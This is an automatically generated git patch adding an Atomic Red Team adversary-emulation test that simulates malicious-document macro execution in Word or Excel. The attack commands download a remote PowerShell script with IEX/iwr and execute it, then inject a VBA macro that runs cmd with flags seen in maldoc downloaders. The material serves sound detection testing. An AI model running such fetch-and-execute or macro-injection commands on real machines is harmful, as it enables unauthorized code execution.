From 6e8971bc79aecef0059456a884b4ebb8f44e4440 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sat, 29 Feb 2020 21:47:05 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1204/T1204.md | 47 ++++++++++++++++++++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 36 ++++++++++++++++++++++++++++++ atomics/windows-index.md | 1 + 4 files changed, 85 insertions(+) diff --git a/atomics/T1204/T1204.md b/atomics/T1204/T1204.md index 944a316a..082d567b 100644 --- a/atomics/T1204/T1204.md +++ b/atomics/T1204/T1204.md @@ -10,6 +10,8 @@ While User Execution frequently occurs shortly after Initial Access it may occur - [Atomic Test #1 - OSTap Style Macro Execution](#atomic-test-1---ostap-style-macro-execution) +- [Atomic Test #2 - Maldoc choice flags command execution](#atomic-test-2---maldoc-choice-flags-command-execution) +
@@ -62,4 +64,49 @@ Stop-Process -Name WINWORD +
+
+ +## Atomic Test #2 - Maldoc choice flags command execution +This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders +Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + +**Supported Platforms:** Windows + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0| +| ms_product | Maldoc application Word or Excel | String | Word| + + +#### Attack Commands: Run with `powershell`! +``` +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" +Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" +``` + +#### Cleanup Commands: +``` +try { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' } catch {} +``` + + +#### Dependencies: Run with `powershell`! +##### Description: Test Requires MS Word or Excel to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys +##### Check Prereq Commands: +``` +If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +``` +$msword = New-Object -ComObject word.application +Stop-Process -Name WINWORD +``` + + + +
diff --git a/atomics/index.md b/atomics/index.md index 9b350385..983670ff 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -803,6 +803,7 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] - [T1204 User Execution](./T1204/T1204.md) - Atomic Test #1: OSTap Style Macro Execution [windows] + - Atomic Test #2: Maldoc choice flags command execution [windows] - [T1047 Windows Management Instrumentation](./T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/index.yaml b/atomics/index.yaml index adaf0243..e94a31bc 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -23802,6 +23802,42 @@ execution: cleanup_command: | if (Test-Path #{jse_path}) { Remove-Item #{jse_path} } try { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' } catch {} + - name: Maldoc choice flags command execution + description: | + This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders + Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + supported_platforms: + - windows + input_arguments: + ms_office_version: + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + type: String + default: '16.0' + ms_product: + description: Maldoc application Word or Excel + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: Test Requires MS Word or Excel to be installed and have been + run previously. Run -GetPrereqs to run msword and build dependant registry + keys + prereq_command: If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) + { exit 0 } else { exit 1 } + get_prereq_command: |- + $msword = New-Object -ComObject word.application + Stop-Process -Name WINWORD + executor: + name: powershell + elevation_required: false + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" + Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + cleanup_command: 'try { Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\'' + -Name ''AccessVBOM'' } catch {} + +' T1047: technique: x_mitre_permissions_required: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 61d5fb83..445bbb0e 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -673,6 +673,7 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] - [T1204 User Execution](./T1204/T1204.md) - Atomic Test #1: OSTap Style Macro Execution [windows] + - Atomic Test #2: Maldoc choice flags command execution [windows] - [T1047 Windows Management Instrumentation](./T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows]